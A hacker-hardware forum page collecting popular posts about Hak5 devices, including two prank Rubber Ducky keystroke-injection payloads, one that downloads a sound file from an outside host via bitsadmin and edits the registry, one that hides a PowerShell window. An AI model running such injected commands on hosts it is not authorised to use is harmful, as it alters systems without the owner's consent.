Jump to content


Popular Content

Showing content with the highest reputation since 04/20/2019 in all areas

  1. 4 points
    I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream. Just in case you want it to feel like a living thing that is suffering as you rip parts off of it. Inspiration from watching too much Michael Reeves. Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download. This will open run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target. DELAY 3000 GUI r DELAY 350 STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" ENTER This downloads a sample .wav (Doom). Replace the above url with another that hosts the desired .wav if you want to change the sound. Fastest way to encode this would be using our single file JS Duck Encoder: https://downloads.hak5.org/ducky
  2. 3 points
    Hi everyone! Inspired by the "Making Windows scream when you unplug devices" payload, I was thinking of other fun payloads you can do with the Rubber Ducky. Lately, a co-worker of mine showed me how you can play music with powershell and after I've seen that, I just had to make a payload with this feature. For those who aren't aware of, you can use "beep" commands with powershell which will, when executed, play a tone. If you want to try it yourself, just open powershell and execute the following commmand: [console]::beep(500,300) When executed, you will hear a short "beep". You can find further information on the powershell beep command here: https://devblogs.microsoft.com/scripting/powertip-use-powershell-to-send-beep-to-console/ So now we can make our own music using powershell. Luckily, there are already some tracks available such as "The Imperial March (Star Wars)" or "Mission Impossible". When I saw this, I just had to make a Rubber Ducky payload out of this. So every time you plug in the Rubber Ducky, it will execute the powershell script and play the Star Wars Imperial March. Here is the payload: DELAY 3000 GUI r DELAY 250 STRING powershell DELAY 250 ENTER DELAY 500 REM Hide the powershell window STRING Add-Type -Name W -Names C -M ' ENTER STRING [DllImport("Kernel32.dll")] ENTER STRING public static extern IntPtr GetConsoleWindow(); ENTER STRING [DllImport("user32.dll")] ENTER STRING public static extern bool MoveWindow(IntPtr h, int X, int Y, int W, int H);' ENTER STRING [C.W]::MoveWindow([C.W]::GetConsoleWindow(),0,0,-1,-1); ENTER REM Play the Imperial March STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);exit ENTER Of course one should be able to loop this so the song will keep playing, but I'll leave that up to you guys 🙂 I know it's a kinda meaningless but fun payload, so I hope some of you will enjoy it! - zSec
  3. 3 points
    Hi! We just released 2.5.4, which on top of 2.5.3, addresses a few issues that have been reported since the launch of 2.5.2 (thank you!). Catch the change log in the first post and upgrade via the WiFi Pineapple OTA or via the Download Center.
  4. 2 points
    Everyone can modify it and create pull requests to Hak5's module GitHub repo. A problem imo. opinion is that the reaver version on Hak5's repo is very much outdated. I'm cross-compiling the latest version of Reaver and keeping them updated as often as I can, but using the newest version requires heavy modifications to the WPS module, due to alot of changes to Reaver.
  5. 2 points
    Hi, This isn't really the topic for this, but nonetheless, I apologise if you're not happy with your device. The book covers the fundamentals of operating the WiFi Pineapple and explains the attacks used as a Rogue AP. You can also find detailed help on each aspect of the Pineapple (read: the modules) via the Help module in the Web UI. If you have more questions that the help text doesn't answer, please feel free to make a new topic on the forums as this one is solely for new firmware releases. Thanks
  6. 2 points
    Hi friends, I don't have time for this yet. I will fix the bug as soon as I can.
  7. 2 points
    We remove all bad posts that are made and block accounts that are obviously spam as soon as we spot them or they are reported. If you want to help, get reporting.
  8. 1 point
    Well i am back to tell you what really happen and why it act the way it did.. It is always human factor,i never realized then i have a different power source on the PI3. (NOT ENOUGH POWER) I am still having problem with the wp6.sh to make the connection and be on the net when you are on dashboard to see bulletin. But it fix it self when you go on page network on the gui to connect at wlan0 🙂
  9. 1 point
    Made some great "white hat" usage of BashBunny this week. Bought a batch of new micro-PCs, built a golden image for them, saved it with CloneZilla. Loaded a bootable CloneZilla Live install on to BB, then made a HID/STORAGE payload that boots target into CloneZilla with pre-scripted restore, redirecting stdout back to /loot. Script on BB waits a few minutes for CloneZilla to complete, then BB reboots both the target and itself to make sure /loot is synced and visible, then checks the logfile for successful completion before LED FINISH. Bing bang boom! Fresh new PC ready to deploy with custom config. Lessons learned: It can be really hard to script blind HID keystrokes when the target might not be consistent each run (BIOS boot device menu sequence, for example). One workaround is to send multiple commands in a sequence that the target will ignore or fail recoverably if irrelevant. /loot doesn't automatically stay in sync between scripts running on BB and on the target when mounted as STORAGE.Having BB reboot itself was the only way I could reliably get it to see updates saved by the target. After a self-reboot, the same payload script can pick up where it left off by first detecting that a file is there now. If I really want real-time two-way communication between BB and target, probably need to use network instead of storage. Next time. Fun project! Thanks Hak5 for a truly useful tool.
  10. 1 point
    I'm sorry that you're not happy with your NANO. I looked through your post history and noticed that your first forum post was only yesterday at the time of writing, I would suggest allowing more time for a response on the forums as it's community-driven. If you could send me your support ticket number via Private Message, i'll take a look as soon as possible. Thanks
  11. 1 point
    thats the patch i put on. you dont know the power of the dark side. tons for like a buck plus like 4 buck shiping on "wish"
  12. 1 point
    The tetra is an OpenWRT box. So just about anything you can do in Openwrt, you can do with the tetra. It would just take some sweet iptable-fu. Also, if you’ve got physical access to the wan box, the rj-45 is input only so you could hardline it to help cut down on the frequency traffic.
  13. 1 point
    Hi all - I understand the desire to use the infusions from the WiFi Pineapple Mark V era. As Seb has previously pointed out, unfortunately the older devices are no longer capable of securely downloading these infusions over the air from our infrastructure. That being said, all of the modules/infusions may be manually installed to either local of SD storage with ease. To that effect I have published the following article on docs.hak5.org - https://docs.hak5.org/hc/en-us/articles/360023458173 Happy hacking!
  14. 1 point
    Honestly, there really is no need to keep bumping this thread... If you run `make menuconfig` (as the link I provided states) and select "Hak5 WiFi Pineapple NANO" and then return to the CLI and run `make` you will get a bootable image for the device...
  15. 1 point
    You could also try using a link shortening service to make any long link much smaller.
  16. 1 point
    I recently downloaded jsencoder.html. When trying to launch spotlight on a MAC I have always used GUI SPACE which works fine with java duckencoder.jar. However on the newer jsencoder.html it doesn't work. Instead it's like it's opening the File menu of CHROME and initiating the save/save as command. Can anyone else confirm this on a mac? Any fixes? Thanks!
  17. 1 point
  18. 1 point
    IIRC 802.11n 5ghz yes and 802.11ac 5ghz no
  19. 1 point
    I would say this needs to go under here:
  20. 1 point
    I think I am onto something.. I have Japanese characters in my wifi names. Maaaybe it just doesn't like to connect to these. Tried to connect to the pineapples own open network and that worked fine with the wlan2 module. Will get around to changing the name today and post any progress.
  21. 1 point
    Give up explaining this. I did on several different threads about meta on the BB. All for people experimenting but I always said you will be there for a minute just for Meta to spin up...maybe 2 and another 4-5 for it to get done doing what it is doing. I know this because I tried running Meta and PowerShell Empire (which is much lighter than Meta) from a Raspberry Pi 3 and Zero. It takes a bit on the Zero that has more horse power than BB and even took awhile on the Pi 3 (new one) so I know it drags on the BB. I mentioned this before, it is much better to figure out what you want out of Meta and Bunnyize it to a much smaller the payload designed for just that autopwm and not the autopwn plus the whole huge library Meta brings with it. Ruby has more overhead on load too so yeah. So, proceed at your own peril. Not a project I am persusing since I have lots of Pis and stuff around me I can use as a USB rat or network rat plus other Hak5 products to do that stuff with...like the Lan Turtle with a remote C2 which can be a Pi sitting on the network somewhere. In my opinion, the BB was meant for quick in and out. Payloads should take that into consideration.
  22. 1 point
    Teaching the ethics behind cybersecurity is important. If students are going to abuse the device, especially against other students then it would make sense to restrict access to anyone caught abusing the device. While also encouraging the general student body to utilize services such as vpn, perhaps the university can provide a free vpn option for students and faculty. With that said, there are a myriad of legal and cool things that a pineapple can do that are not disruptive. That of course should be the academic focus. Some encouragement through things like hack-a-thons could even improve overall network security. Like a competition to establish a low cost vpn solution for the school. Wifi Nano is a great platform to begin development because it is a type of development environment too. Positives seem to outweigh negatives. Although a pineapple is a threat, an advanced user could easily create such attacks with their own hardware. Why would they need a pineapple, if they are that advanced; they probably know that...
  23. 1 point
    Attach a debug log here, generated via the Help module.
  24. 1 point
    Hi! We just released 2.5.4, which on top of 2.5.3, addresses a few issues that have been reported since the launch of 2.5.2 (thank you!). Catch the change log in the first post and upgrade via the WiFi Pineapple OTA or via the Download Center.
  25. 1 point
  26. 1 point
    You could theoretically brick it. But the Pineapples have that sweet factory-reset mode built into the bootloader. So as long as the bootloader isn't touched, you should be safe. Most upgrade files doesn't modify the bootloader.
  27. 1 point
    Your best option for help would be the discord channel. The forum is slow yes, but things do get answered eventually
  28. 1 point
    what firmware version are you using and the 100%cpu on the dashboard is fine. If you ssh to the pineapple and run top it wont show constant 100%cpu.
  29. 1 point
    For all the people who are new at this whole “computer†thing and don’t really understand what hacking is all about and where to begin, I offer up these links to some great places to start learning. Please contribute to this thread and I will keep it up to date. Probably should be made sticky. News: www.digg.com www.slashdot.org Presentations: http://www.lessig.org/freeculture/free.html <-- A speech given talking all about the problems facing culture when dealing with copyright and other digital laws. Podcasts: http://www.grc.com/SecurityNow.htm <-- This is fantastic for people who are new to the field. If you have the time or motivation, go back and listen to them from day 1, they assume you know very little if anything and hit on all of the major topics in the security field. Fantastic show. IPTV Shows: http://www.binrev.com/ <-- Produce a good IPTV show and also have forums that are usually helpful. http://www.hak5.org <--- Duh.... Tutorial sites: http://www.remote-exploit.org <-- Pretty good resources, some very nice video tutorials on various exploits. Defiantly check out the tutorial section. http://www.irongeek.com/ <-- Excellent tutorials/information/articles. http://www.antionline.com/ <-- Tutorials, tools and forums full of helpful people. Programming Related: Teach Yourself C in 21 Days: http://neonatus.net/C/index.html Teach Yourself C++ in 21 Days: http://cma.zdnet.com/book/c++/ The Art of Assembly Language Programming: http://maven.smith.edu/~thiebaut/ArtOfAssembly/artofasm.html Microsoft Developers Network: http://msdn.microsoft.com ----Web Programming: HTML: http://www.w3schools.com PHP: http://www.php.net ASP.NET: http://www.asp.net/Default.aspx?tabindex=0&tabid=1 SQL: http://www.mysql.com Perl: http://www.perl.com/ Python: http://www.python.org Security Related: SecurityFocus: http://www.securityfocus.com/ Milw0rm: http://www.milw0rm.com SecurityForest: http://securityforest.com/wiki/index.php/Main_Page
  30. 1 point
  31. 1 point
    These forums are attracting more and more of this bullshit. Admins should be shit canning these members accounts. IMHO.
  32. 1 point
    have the same issue noone in the discord can help me so like im just gonna give up
  33. 1 point
    Hello everyone! I haven't used my wifi pine in a while and was working fine before i did a update. since the update (2.4.2 and 2.5.2) wont connect to the internet when i use wlan2 (second usb wifi adapter) and i can't seem to find a reason why. I can get it to connect to my PC with no issue but can't do it this way. Is there a fix or is it not working anymore?
  34. 1 point
    I am having the exact same issues.
  35. 1 point
  36. 1 point
    Good one hey, only thing missing is a cup of java a HackRF Looks like it could fit in there nicely
  37. 1 point
    The best way to protect the rogue AP is using the Filters tab. With proper recon, you should be able to identify the MACs or SSIDs of the target devices and add them to the filter. With the filters set to "allow" mode, only devices with a MAC address or SSID in one of the pools will be able to connect. If you are looking to minimize collateral damage then filters are a good choice. One of the benefits of a rogue AP attack is that you don't necessarily have to be inside of the building for it to be successful. If the employees have directly received instructions to connect to the rogue access point then that means a) the hacker has physical access to the building or b) has social-engineered someone into providing the credentials to employees. In either case, the hacker is already far beyond rogue access points in terms of potential harm to the company.
  38. 1 point
    Hey everyone, We have recently discovered a bug in the update process of the Bash Bunny, which causes boot-loops. The bug is triggered if the upgrade file had been extracted, renamed, or was otherwise altered. Fortunately, we have now found a fix for the issue: Plug in the Bash Bunny and unplug it immediately when the initial green LED turns off Repeat step #1 three times Plug the Bash Bunny back in and wait for it to reset. You should see either a "police" pattern or a red blinking LED. Set the switch to the switch1 position (furthest from the USB port) Wait for the device to reboot (indicated by the green led) and set the switch to arming mode immediately as the green light turns off. If all went well, you should now be able to access the Mass Storage partition of the Bash Bunny (or serial in). Delete any leftover update files (such as "ch_fw_1.3_264 (1).tar.gz") Safely eject / sync the Bash Bunny Reboot your device, by re-plugging it, while keeping the switch in arming mode. This should get your Bash Bunny up-and-running on firmware v1.0, allowing you to properly upgrade to the latest version. We recommend using the Bash Bunny Updater for this. We have released firmware 1.4 which prevents this bug from being triggered. Note: These instructions are not the same as the one from this thread. Similar, but more reliable.
  39. 1 point
    Q: Just lately I've noticed that when running PineAP, my mobile devices (iOS, Mac OS) aren't probing much. When I check the logs, I see that my neighbours devices, and other devices where I'm scanning are making far more probes. I'd have expected the local/stronger signal devices to make the probes, especially as they've been more prevalent with their probing in the past. any thoughts?
  40. 1 point
    here are some more links: http://www.hackthissite.org/ http://www.kellys-korner-xp.com/win_xp_passwords.htm http://www.lurhq.com/cachepoisoning.html http://www.mit.edu/hacker/hacker.html http://www.nostarch.com/download/hacking_ch3.pdf http://www.docdroppers.org/wiki/index.php?title=Hacking http://tinyurl.com/h9wws http://www.hackerthreads.org/phpbb/index.php http://www.library.2ya.com/
  41. 1 point
    All I have to say is, www.google.com
  42. 1 point
    Yeah its hard to gauge what to suggest, everyone will be starting at different levels of expertise and wanting to focus on different areas. Perhaps once we gather a bit more content we should shift this to the Hak.5 Wiki?
  • Create New...